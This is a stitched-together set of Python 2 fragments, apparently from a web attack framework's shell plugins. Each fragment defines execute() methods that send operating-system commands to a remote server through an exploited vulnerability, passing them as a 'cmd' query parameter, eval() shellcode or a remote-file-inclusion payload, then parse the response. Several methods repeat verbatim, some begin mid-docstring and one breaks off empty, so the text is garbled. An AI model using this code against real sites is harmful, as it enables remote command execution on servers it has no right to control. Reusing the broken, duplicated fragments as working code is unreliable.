def execute(self, command):
"""
This method executes a command in the remote operating system by
exploiting the vulnerability.
:param command: The command to handle ( ie. "ls", "whoami", etc ).
:return: The result of the command.
"""
to_send = self.exploit_url + command
to_send = URL(to_send)
response = self._uri_opener.GET(to_send)
return shell_handler.extract_result(response.get_body())
def execute(self, command):
"""
This method executes a command in the remote operating system by
exploiting the vulnerability.
:param command: The command to handle ( ie. "ls", "whoami", etc ).
:return: The result of the command.
"""
to_send = self.exploit_url + command
to_send = URL(to_send)
response = self._uri_opener.GET(to_send)
return shell_handler.extract_result(response.get_body())
def execute(self, command):
"""
This method is called when a user writes a command in the shell and
hits enter.
Before calling this method, the framework calls the generic_user_input
method from the shell class.
:param command: The command to handle ( ie. "read", "exec", etc ).
:return: The result of the command.
"""
to_send = self.get_exploit_URL()
to_send.querystring = u'cmd=' + command
response = self._uri_opener.GET(to_send)
return shell_handler.extract_result(response.get_body())
def execute(self, command):
"""
This method is called when a user writes a command in the shell and
hits enter.
Before calling this method, the framework calls the generic_user_input
method from the shell class.
:param command: The command to handle ( ie. "read", "exec", etc ).
:return: The result of the command.
"""
to_send = self.get_exploit_URL()
to_send.querystring = u'cmd=' + command
response = self._uri_opener.GET(to_send)
return shell_handler.extract_result(response.get_body())
:param command: The command to handle ( ie. "read", "exec", etc ).
:return: The result of the command.
"""
mutant = self._exploit_mutant.copy()
uri = mutant.get_uri()
uri.querystring.update([('cmd', [command])])
try:
http_res = self._uri_opener.send_mutant(mutant)
except BaseFrameworkException, w3:
return 'Exception from the remote web application: "%s"' % w3
except Exception, e:
return 'Unhandled exception from the remote web application: "%s"' % e
else:
return shell_handler.extract_result(http_res.get_body())
def end(self):
"""
Finish execution, clean-up, remove file.
"""
om.out.debug('Remote file inclusion shell is cleaning up.')
try:
self._rm_file(self._exploit_mutant.get_token_value())
except Exception, e:
msg = 'Remote file inclusion shell cleanup failed with exception: %s'
om.out.error(msg % e)
else:
om.out.debug('Remote file inclusion shell cleanup complete.')
def get_name(self):
This method executes a command in the remote operating system by
exploiting the vulnerability.
:param command: The command to handle ( ie. "ls", "whoami", etc ).
:return: The result of the command.
"""
# Lets send the command.
mutant = self.get_mutant()
mutant = mutant.copy()
mutant.set_token_value(self.shellcode_generator(command))
try:
response = self._uri_opener.send_mutant(mutant)
except BaseFrameworkException, w3:
msg = 'An error occurred while trying to exploit the eval()'\
' vulnerability (sending command %s). Original exception:' \
' "%s".'
om.out.debug(msg % (command, w3))
return 'Unexpected error, please try again.'
else:
return shell_handler.extract_result(response.get_body())
def get_name(self):
return 'eval_shell'
def __reduce__(self):
"""
Need to define this method since the Shell class defines it, and we have
a different number of __init__ parameters.
"""
return self.__class__, (self._vuln, None, None, self.shellcode_generator)
:param command: The command to handle ( ie. "read", "exec", etc ).
:return: The result of the command.
"""
mutant = self._exploit_mutant.copy()
uri = mutant.get_uri()
uri.querystring.update([('cmd', [command])])
try:
http_res = self._uri_opener.send_mutant(mutant)
except BaseFrameworkException, w3:
return 'Exception from the remote web application: "%s"' % w3
except Exception, e:
return 'Unhandled exception from the remote web application: "%s"' % e
else:
return shell_handler.extract_result(http_res.get_body())
def end(self):
"""
Finish execution, clean-up, remove file.
"""
om.out.debug('Remote file inclusion shell is cleaning up.')
try:
self._rm_file(self._exploit_mutant.get_token_value())
except Exception, e:
msg = 'Remote file inclusion shell cleanup failed with exception: %s'
om.out.error(msg % e)
else:
om.out.debug('Remote file inclusion shell cleanup complete.')
def get_name(self):
exploiting the vulnerability.
:param command: The command to handle ( ie. "ls", "whoami", etc ).
:return: The result of the command.
"""
# Lets send the command.
mutant = self.get_mutant()
mutant = mutant.copy()
mutant.set_token_value(self.shellcode_generator(command))
try:
response = self._uri_opener.send_mutant(mutant)
except BaseFrameworkException, w3:
msg = 'An error occurred while trying to exploit the eval()' \
' vulnerability (sending command %s). Original exception:' \
' "%s".'
om.out.debug(msg % (command, w3))
return 'Unexpected error, please try again.'
else:
return shell_handler.extract_result(response.get_body())
def get_name(self):
return 'eval_shell'
def __reduce__(self):
"""
Need to define this method since the Shell class defines it, and we have
a different number of __init__ parameters.
"""
return self.__class__, (self._vuln, None, None, self.shellcode_generator)
def extract_result(self, http_response):
try:
return shell_handler.extract_result(http_response.get_body())
except BaseFrameworkException:
return None
